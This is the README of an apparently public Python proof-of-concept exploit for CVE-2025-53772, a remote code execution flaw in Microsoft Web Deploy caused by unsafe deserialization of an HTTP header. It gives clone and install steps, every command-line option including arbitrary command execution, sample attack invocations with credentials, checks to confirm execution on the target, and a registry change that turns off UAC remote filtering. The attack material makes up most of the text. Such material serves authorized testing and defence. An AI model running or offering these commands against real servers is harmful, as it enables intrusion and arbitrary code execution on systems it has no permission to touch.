
PoC para CVE-2025-53772
Un exploit basado en Python para CVE-2025-53772, una vulnerabilidad de ejecución remota de código en Microsoft Web Deploy (msdeploy) causada por una deserialización insegura de datos de cabeceras HTTP.

| Propiedad | Valor |
|---|
| CVE ID | CVE-2025-53772 |
| Puntuación CVSS | 8.8 (Alta) |
| Producto afectado | Microsoft Web Deploy 4.0 |
| Versiones vulnerables | < 10.0.2001 |
| Versión parcheada | 10.0.2001+ |
| Tipo de vulnerabilidad | Deserialización de datos no confiables (CWE-502) |
| Autenticación | Requerida (Privilegio bajo) |
La vulnerabilidad existe en la deserialización de la cabecera HTTP MSDeploy.SyncOptions. Cuando se envía un payload especialmente diseñado, el servidor lo deserializa usando BinaryFormatter, lo que desencadena la ejecución arbitraria de código a través de la cadena de gadgets TypeConfuseDelegate.
Attacker Target Server
│ │
│ POST /MSDEPLOYAGENTSERVICE HTTP/1.1 │
│ MSDeploy.SyncOptions: <malicious_payload> │
│─────────────────────────────────────────────>│
│ │
│ BinaryFormatter.Deserialize()
│ │
│ ▼
│ Process.Start("cmd.exe", "/c ...")
│ │
│ ▼
│ RCE Achieved!
| Endpoint | Puerto | Protocolo | Tipo de autenticación |
|---|---|---|---|
/MSDEPLOYAGENTSERVICE | 80 | HTTP | NTLM |
/msdeploy.axd | 8172 | HTTPS | Básica |
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp
-t, --target Target IP or hostname (required)
-u, --user Username (required)
-P, --password Password (required)
--port Target port (default: 80)
--endpoint Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm Use NTLM authentication (required for Agent Service)
--calc Execute calc.exe
--proof-temp Create C:\Windows\Temp\pwned.txt
--proof-web Create C:\inetpub\wwwroot\pwned.txt
-c, --command Custom command to execute
--generate-only Only generate payload, don't send
-o, --output Save payload to file
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc
# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp
# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web
# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"
# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp
Después de ejecutar el exploit, verifica la ejecución en el objetivo:
# Check for proof file
type C:\Windows\Temp\pwned.txt
# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt
Si usas el Servicio de agente con NTLM y recibes un 401:
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Es posible que el controlador de IIS no esté registrado. Usa el endpoint del Servicio de agente en su lugar:
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001
Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Obtén siempre la autorización adecuada antes de realizar pruebas.
Licencia MIT